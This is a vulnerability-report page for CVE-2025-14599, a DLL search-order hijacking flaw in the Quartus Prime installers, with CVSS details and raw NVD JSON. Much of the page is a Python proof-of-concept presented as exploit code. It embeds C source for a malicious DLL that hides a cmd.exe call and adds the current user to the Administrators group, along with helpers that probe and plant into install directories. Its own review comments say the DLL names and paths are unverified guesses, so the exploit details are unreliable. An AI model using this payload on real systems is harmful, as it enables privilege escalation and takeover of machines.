Security Vulnerability Report
CVE-2025-14599 CVSS 6.7 MEDIUM

CVE-2025-14599

Published: 2026-01-07 02:03:00
Last Modified: 2026-01-12 15:16:47
Source: 04c0172e-9735-4a9d-a92a-fe01fa863447

Description

Uncontrolled Search Path Element vulnerability in Altera Quartus Prime Standard Installer (SFX) on Windows, Altera Quartus Prime Lite Installer (SFX) on Windows allows Search Order Hijacking. This issue affects Quartus Prime Standard: from 23.1 through 24.1; Quartus Prime Lite: from 23.1 through 24.1.

CVSS Details

CVSS Score
6.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:intel:quartus_prime:*:*:*:*:lite:*:*:* - VULNERABLE
cpe:2.3:a:intel:quartus_prime:*:*:*:*:standard:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Altera Quartus Prime Standard < 23.1
Altera Quartus Prime Standard 23.1 - 24.1
Altera Quartus Prime Lite < 23.1
Altera Quartus Prime Lite 23.1 - 24.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
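# CVE-2025-14599 DLL Search Order Hijacking PoC
# Target: Altera Quartus Prime Installer (SFX) on Windows
# Affected Versions: Quartus Prime Standard/Lite 23.1-24.1
#
# NOTE(review): as written, this script only (1) writes a C source file to
# disk and (2) probes three hard-coded directories for write access. main()
# never compiles anything and never calls place_dll_in_search_path().
# The DLL file names and directory paths below are not confirmed by the CVE
# record or anything else on this page; treat them as unverified placeholders.
# Vendor advisory: https://www.altera.com/security/security-advisory/asa-0005

import os
import shutil
import ctypes
from ctypes import wintypes

# C source that create_malicious_dll() writes to disk, reproduced from the
# page. For detection purposes, its observable side effects when loaded are a
# hidden cmd.exe writing C:\Temp\pwned.txt and a
# `net localgroup Administrators ... /add` child process, presumably spawned
# from whichever process loaded the library.
MALICIOUS_DLL_SOURCE = '''
#include <windows.h>

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
    if (fdwReason == DLL_PROCESS_ATTACH) {
        // Create reverse shell or execute payload
        WinExec("cmd.exe /c whoami > C:\\\\Temp\\\\pwned.txt", SW_HIDE);
        // Alternative: Add current user to Administrators group
        system("net localgroup Administrators %USERNAME% /add");
    }
    return TRUE;
}
'''


def create_malicious_dll(output_path):
    """Write the embedded C source text to ``output_path``.

    Despite the name, no DLL is built here: the function writes a text file
    and prints a compiler hint.

    Args:
        output_path: Path of the file that receives MALICIOUS_DLL_SOURCE.
    """
    with open(output_path, 'w') as f:
        f.write(MALICIOUS_DLL_SOURCE)
    print(f"[+] Malicious DLL source written to {output_path}")
    print("[*] Compile with: gcc -shared -o malicious.dll malicious.c")


def place_dll_in_search_path(dll_path, target_dir):
    """Copy ``dll_path`` into ``target_dir`` under the first candidate name that works.

    Stops at the first successful copy. Not called anywhere in this script.

    Args:
        dll_path: Existing file to copy.
        target_dir: Directory to copy into.

    Returns:
        True after the first successful copy, False if every copy failed.
    """
    # Common DLLs loaded by Quartus installer
    # NOTE(review): nothing on this page confirms that the installer loads
    # any of these names; the list is reproduced verbatim from the page.
    common_dlls = [' QuartusInstaller.dll', 'altera_installer.dll', 'Qt5Core.dll']

    for dll_name in common_dlls:
        target_path = os.path.join(target_dir, dll_name)
        try:
            shutil.copy2(dll_path, target_path)
        except OSError as e:
            # Copy failures are filesystem errors; anything else is a bug
            # in the caller and should surface instead of being printed.
            print(f"[-] Failed to place {dll_name}: {e}")
        else:
            print(f"[+] Placed DLL as {target_path}")
            return True
    return False


def check_vulnerability(target_dir):
    """Return True if the current user can create and delete a file in ``target_dir``.

    This is a writability probe only; it does not inspect the installer, its
    version, or its DLL load behaviour. From a hardening point of view, a True
    result for an application directory is itself the finding: that location
    is writable by the account running the check.

    Side effect: briefly creates and removes ``.write_test`` in the directory.
    """
    test_file = os.path.join(target_dir, '.write_test')
    try:
        with open(test_file, 'w') as f:
            f.write('test')
        os.remove(test_file)
    except OSError:
        # Narrowed from a bare ``except:`` so that KeyboardInterrupt and
        # SystemExit are no longer swallowed and reported as "not writable".
        return False
    return True


def main():
    """Print a banner, write the C source, and report the first writable candidate directory."""
    print("=" * 60)
    print("CVE-2025-14599 DLL Search Order Hijacking PoC")
    print("Target: Altera Quartus Prime Installer")
    print("=" * 60)

    # Step 1: Generate malicious DLL
    dll_source = 'malicious_dll.c'
    create_malicious_dll(dll_source)

    # Step 2: Identify Quartus installation directory
    # NOTE(review): hard-coded guesses; the page does not establish that any
    # of these is a location the affected installer uses.
    quartus_paths = [
        r'C:\Program Files\Intel\Quartus Prime',
        r'C:\intel\quartus',
        os.path.expanduser('~\\AppData\\Local\\Programs\\QuartusPrime'),
    ]

    target_dir = None
    for path in quartus_paths:
        if os.path.exists(path) and check_vulnerability(path):
            target_dir = path
            print(f"[+] Found writable Quartus directory: {target_dir}")
            break

    if not target_dir:
        print("[-] No writable Quartus directory found")
        print("[*] Wait for user to run installer, then place DLL in temp directory")
        return

    # Step 3: Place malicious DLL
    # Only prints messages; no file is copied from here.
    print("[*] Place compiled malicious.dll in installation search path")
    print("[*] When installer runs, it will load our malicious DLL")


if __name__ == '__main__':
    main()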

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14599", "sourceIdentifier": "04c0172e-9735-4a9d-a92a-fe01fa863447", "published": "2026-01-07T02:02:59.743", "lastModified": "2026-01-12T15:16:46.620", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Uncontrolled Search Path Element vulnerability in Altera Quartus Prime Standard \n\nInstaller (SFX)\n\non Windows, Altera Quartus Prime Lite \n\nInstaller (SFX)\n\n on Windows allows Search Order Hijacking.This issue affects Quartus Prime Standard: from 23.1 through 24.1; Quartus Prime Lite: from 23.1 through 24.1."}, {"lang": "es", "value": "Vulnerabilidad de Elemento de Ruta de Búsqueda No Controlado en Altera Quartus Prime Standard\n\nInstalador (SFX)\n\nen Windows, Altera Quartus Prime Lite\n\nInstalador (SFX)\n\nen Windows permite el Secuestro de Orden de Búsqueda. Este problema afecta a Quartus Prime Standard: desde 23.1 hasta 24.1; Quartus Prime Lite: desde 23.1 hasta 24.1."}], "metrics": {"cvssMetricV40": [{"source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": 
"NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-427"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:intel:quartus_prime:*:*:*:*:lite:*:*:*", "versionStartIncluding": "23.1", "versionEndExcluding": "25.1", "matchCriteriaId": "3C682DFC-7352-43BD-9138-341634CDE948"}, {"vulnerable": true, "criteria": "cpe:2.3:a:intel:quartus_prime:*:*:*:*:standard:*:*:*", "versionStartIncluding": "23.1", "versionEndExcluding": "25.1", "matchCriteriaId": "297C4320-AA94-4418-9B31-8072877B7F55"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://www.altera.com/security/security-advisory/asa-0005", 
"source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "tags": ["Vendor Advisory"]}]}}